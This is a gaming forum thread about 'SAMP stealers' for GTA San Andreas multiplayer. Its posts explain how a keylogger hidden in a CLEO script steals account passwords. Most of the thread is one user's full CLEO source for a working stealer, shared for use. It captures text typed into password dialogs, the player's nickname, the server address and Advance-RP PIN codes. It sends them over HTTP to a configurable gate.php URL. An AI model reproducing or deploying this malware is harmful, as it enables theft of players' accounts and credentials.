SAMP Stealler
- Thread starter esmer_gm
- Start date
springfield
God
- Joined
- Feb 18, 2005
- Messages
- 2,965
- Reaction score
- 271
inZ link said:
When you join a RP server(for these servers are stealer made mostly) a dialog shows up than requires you to type your account password. Once typed cleo sends your NAME/SERVER-IP/PASSWORD to a ftp, and now some people have your sa:mp account password.
It's a SAMP keylogger.
When SAMP launches gta_sa.exe, that launches ASI loader, which launches CLEO.asi, CLEO.asi loads all .cs files including the keylogger hidden in a CLEO script.
The keylogger records in-game keystrokes and/or text typed in the dialog boxes; gerts your name and server address, and sends that to FTP OR makes an HTML file, sends it to FTP then deletes the file.
However, in the scripts I've seen, aren't there too little arguments; you need server address, username, password and folder at least...?
When SAMP launches gta_sa.exe, that launches ASI loader, which launches CLEO.asi, CLEO.asi loads all .cs files including the keylogger hidden in a CLEO script.
The keylogger records in-game keystrokes and/or text typed in the dialog boxes; gerts your name and server address, and sends that to FTP OR makes an HTML file, sends it to FTP then deletes the file.
However, in the scripts I've seen, aren't there too little arguments; you need server address, username, password and folder at least...?
springfield
God
- Joined
- Feb 18, 2005
- Messages
- 2,965
- Reaction score
- 271
What error?
Also there are probably more 'key @' to replace with 0AB0.
Also there are probably more 'key @' to replace with 0AB0.
if someone is still interested in this topic, i found a working one for 0.3z
i got a private folder full of this shit from kat.hosting.ru someone released it.
Code:
{$CLEO}
0000: T.G
const
URL = "yourURL"
ADD_URL = "gate.php"
end
call @create_new_thread 1 @Stealer // Create new thread(stealer)
32@ = 0
33@ = 0
repeat
wait 400
until 0AFA: is_samp_structures_available
:Main
while true
wait 0
// MAIN CODE
if
33@ = SAMP.Base()
else_jump @miner_83 //
0A93: end_custom_thread
:miner_83 //
end
:Stealer
const
// SAMP Dialog Styles
DIALOG_STYLE_MSGBOX = 0
DIALOG_STYLE_INPUT = 1
DIALOG_STYLE_LIST = 2
DIALOG_STYLE_PASSWORD = 3
GAMESTATE_CONNECTED = 3
aData = 1@
size_aData = 2048
buf = 2@
format_string = 3@
library_point = 5@
aData_dlgid = 0
aData_nick = 1
aData_ip = 2
aData_sname = 3
aData_dlgtext = 4
aData_pincode = 5
end
repeat
wait 100
until 0AA2: library_point = load_library "wininet.dll"
while true
wait 0
0@ = SAMP.GetGamestate()
if 0@ == GAMESTATE_CONNECTED
jf continue
gosub @steal_arp_pincodes //
if Samp.IsDialogActive(-1)
jf continue
0@ = Samp.GetDialogType()
if or
0@ == DIALOG_STYLE_INPUT
0@ == DIALOG_STYLE_PASSWORD
jf continue
alloc aData size_aData
alloc buf 128
alloc format_string 257
0c11: memset aData 0 size_aData
0c11: memset buf 0 128
0c11: memset format_string 0 257
while Samp.IsDialogActive(-1)
wait 0
// ---- WRITE DIALOG ID TO ARRAY
0@ = Samp.GetDialogID()
format format_string = "%d" 0@
0C20: string_array aData element aData_dlgid size 128 = format_string
// --------------------------------------------------
// GENERAL INFO: NICK, IP, SERVER NAME
call @WriteGeneralInfo 3 data aData buf format_string
// ---- STEAL
0c11: memset buf 0 128
while SAMP.IsDialogActive(-1)
wait 0
buf = SAMP.GetDialogInputBoxText()
end
0C20: string_array aData element aData_dlgtext size 128 = buf
// --------------------------------------------------
wait 0 // %
0c11: memset format_string 0 257 // clear string
0085: 4@ = format_string // get start pointer of string
// ---- PREPARING SENDING DATA TO A URL
call @PreparingGeneralInfo 2 aData format_string ret_to format_string
0C1F: 8@ = string_array aData element aData_dlgid size 128
format format_string = "&dialog=%s" 8@
0c17: strlen 8@ format_string
005a: format_string += 8@
0C1F: 8@ = string_array aData element aData_dlgtext size 128
call @converter_russian_sym 1 string 8@ to 9@
format format_string = "&input=%s" 9@
free 9@
// --------------------------------------------------
0085: format_string = 4@ // GO TO START OF STRING
// ---- SEND DATA TO A URL
call @SendData 2 str format_string lib library_point
// --------------------------------------------------
end
free aData
free buf
free format_string
4@ = 0
end
:steal_arp_pincodes
// ADVANCE-RP | STEAL PIN-CODE
0@ = SAMP.Base()
0@ += 0x212A80
0A8D: 0@ = read_memory 0@ size 4 virtual_protect 0
0@ += 985
0A8D: 0@ = read_memory 0@ size 4 virtual_protect 0
0A8D: 6@ = read_memory 0@ size 4 virtual_protect 0
6@ += 9216
0A90: 7@ = 2048 * 4
005a: 7@ += 6@
0A8D: 7@ = read_memory 7@ size 4 virtual_protect 0
if 7@ > 0
then
alloc aData size_aData
alloc buf 128
alloc format_string 257
0c11: memset aData 0 size_aData
0c11: memset buf 0 128
0c11: memset format_string 0 257
0085: 4@ = format_string
12@ = 0
while true
wait 0
for 8@ = 2048 to 2057
0A90: 7@ = 8@ * 4
005a: 7@ += 6@
0A8D: 9@ = read_memory 7@ size 4 virtual_protect 0
if 9@ > 0
then
10@ = 416.0
11@ = 168.0
/*
SIZE BLOCK = 30x30 px.
EMPTY SPACE = 10 px.
----------------------
| 2048 | 2049 | 2050 |
| 2051 | 2052 | 2053 |
| 2054 | 2055 | 2056 |
| | 2057 | |
----------------------
*/
if or
8@ == 2049
8@ == 2052
8@ == 2055
8@ == 2057
then 10@ += 40.0
end
if or
8@ == 2050
8@ == 2053
8@ == 2056
then 10@ += 80.0
end
if 8@ >= 2051
then
11@ += 40.0
if 8@ >= 2054
then
11@ += 40.0
if 8@ == 2057
then 11@ += 40.0
end
end
end
if call @is_cursor_here 4 sXY 10@ 11@ eXY 29.0 29.0
then
if 0ab0: key 1
then
while 0ab0: key 1
wait 0
end
if call @is_cursor_here 4 sXY 10@ 11@ eXY 29.0 29.0
then
format format_string = "%s" 9@
format_string++
12@++
if 12@ >= 4
then
0085: format_string = 4@
0C20: string_array aData element aData_pincode size 128 = format_string
0c11: memset format_string 0 257 // clear string
call @WriteGeneralInfo 3 data aData buf format_string
0c11: memset format_string 0 257 // clear string
// ---- PREPARING SENDING DATA TO A URL
call @PreparingGeneralInfo 2 aData format_string ret_to format_string
0C1F: 8@ = string_array aData element aData_pincode size 128
format format_string = "&pincode=%s" 8@
0c17: strlen 8@ format_string
005a: format_string += 8@
if SAMP.IsLocalPlayerSpawned()
then format format_string = "&spawned=1"
else format format_string = "&spawned=0"
end
0085: format_string = 4@
// --------------------------------------------------
call @SendData 2 format_string lib library_point
0c11: memset format_string 0 257
12@ = 0
end
end
end
end
end
end
if 9@ <= 0
then break
end
end
free aData
free buf
free format_string
4@ = 0
end
// ---------------------------------------------------------------------------------
return
// ---------------------------------------------
// /////////////////////////////////////////////
// ||||||||||||||||| FUNCTIONS |||||||||||||||||
// \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
// ---------------------------------------------
:WriteGeneralInfo
// ---- WRITE NICKNAME TO ARRAY
3@ = SAMP.GetSAMPPlayerIDByActorHandle($PLAYER_ACTOR)
3@ = SAMP.GetPlayerNickname(3@)
0C20: string_array 0@ element aData_nick size 128 = 3@
// --------------------------------------------------
// ---- WRITE IP:PORT TO ARRAY
SAMP.GetCurrentServerAddress(1@, 3@)
format 2@ = "%s:%d" 1@ 3@
0C20: string_array 0@ element aData_ip size 128 = 2@
// --------------------------------------------------
// ---- WRITE SERVER NAME TO ARRAY
1@ = SAMP.GetCurrentServerName()
0C20: string_array 0@ element aData_sname size 128 = 1@
// --------------------------------------------------
ret 0
:PreparingGeneralInfo
0C1F: 2@ = string_array 0@ element aData_nick size 128
format 1@ = "%s?nick=%s" ADD_URL 2@
0c17: strlen 2@ 1@
005a: 1@ += 2@
0C1F: 2@ = string_array 0@ element aData_ip size 128
format 1@ = "&ip=%s" 2@
0c17: strlen 2@ 1@
005a: 1@ += 2@
0C1F: 2@ = string_array 0@ element aData_sname size 128
call @converter_russian_sym 1 string 2@ to 3@
format 1@ = "&serv=%s" 3@
free 3@
0c17: strlen 2@ 1@
005a: 1@ += 2@
ret 1 1@
:SendData
// call @SendData 2 str 0@ lib 1@
0AA4: 31@ = get_proc_address "InternetOpenA" library 1@
0AA7: call_function 31@ num_params 5 pop 0 params 0 0 "" 0 "Google Chrome/legend edition 1.2" to 3@
if 3@ <> 0x0
then
0AA4: 31@ = get_proc_address "InternetConnectA" library 1@
0AA7: call_function 31@ num_params 8 pop 0 params 0 0 3 0 0 80 URL hInternet 3@ to 4@ // Preparing
if 4@ <> 0x0
then
0AA4: 31@ = get_proc_address "HttpOpenRequestA" library 1@
0AA7: call_function 31@ num_params 8 pop 0 params 0 0x80400100 "" "" "HTTP/1.1" 0@ "GET" 4@ to 5@ // Create request
if 5@ <> 0x0
then
0AA4: 31@ = get_proc_address "HttpSendRequestA" library 1@
0AA7: call_function 31@ num_params 5 pop 0 params 0 "" 62 "Content-Type: application/x-www-form-urlencoded; charset=windows-1251" 5@ to 6@ // Send
end
end
end
0AA4: 31@ = get_proc_address "InternetCloseHandle" library 1@
0AA7: call_function 31@ num_params 1 pop 0 params 3@ ret_to 30@
0AA7: call_function 31@ num_params 1 pop 0 params 4@ ret_to 30@
0AA7: call_function 31@ num_params 1 pop 0 params 5@ ret_to 30@
ret 0
:converter_russian_sym
const
_string = 0@
array_chars = 1@
lstr = 2@
size_nstring = 4@
_nstring = 6@
p_nstring = 7@
end
var
_string : int
lstr : int
array_chars : int
_nstring : int
p_nstring : int
end
// call @converter_russian_sym 1 string 0@ to 6@
0c17: strlen lstr _string
0A90: size_nstring = lstr * 4
alloc _nstring size_nstring
0c11: memset _nstring 0 size_nstring
p_nstring = _nstring
0ac6: lo array_chars @chars
for 3@ = 0 to lstr
0A8D: 5@ = read_memory _string size 1 virtual_protect 0
if 5@ <> 0
jf break
if and
5@ > 191
5@ < 256
then
5@ -= 192
0A8E: 5@ = array_chars + 5@
0A8D: 5@ = read_memory 5@ size 1 virtual_protect 0
end
format _nstring = "%02X" 5@
_nstring += 2
_string++
end
_nstring = p_nstring
ret 1 _nstring
:chars
hex
C0 C1 C2 C3 C4 C5 C6 C7 C8 C9 CA CB CC CD CE CF D0 D1 D2 D3 D4 D5 D6 D7 D8 D9 DA DB DC DD DE DF E0 E1 E2 E3 E4 E5 E6 E7 E8 E9 EA EB EC ED EE EF F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF 00
end
:create_new_thread
0A9F: 32@ = current_thread_pointer
000A: 32@ += 0x10
0A8D: 32@ = read_memory 32@ size 4 virtual_protect 0
0062: 32@ -= 0@
0AA7: call_function 0x464C20 num_params 1 pop 1 32@ 33@
005A: 32@ += 0@
000A: 33@ += 0x10
0A8C: write_memory 33@ size 4 value 32@ virtual_protect 0
000A: 33@ += 0x2C
for 32@ = 0 to 30
0A8C: write_memory 33@ size 4 value 1@(32@,30i) virtual_protect 0
000A: 33@ += 4
end
0AB2: ret 0
:is_cursor_here
// call @is_cursor_here 4 sXY 0@ 1@ eXY 2@ 3@
0B5E: get_cursor_pos 30@ 31@
0B5F: convert_window_screen_coords 30@ 31@ to_game_screen_coords 4@ 5@
if and
0025: 4@ > 0@
0025: 5@ > 1@
then
005B: 0@ += 2@
005B: 1@ += 3@
if and
0025: 0@ > 4@
0025: 1@ > 5@
then ret 0 1
end
end
0AB2: ret 0i got a private folder full of this shit from kat.hosting.ru someone released it.
DogoCaraballo
Active member
- Joined
- Dec 1, 2014
- Messages
- 25
- Reaction score
- 0
does this still work? every scrip i get crashes :stoned: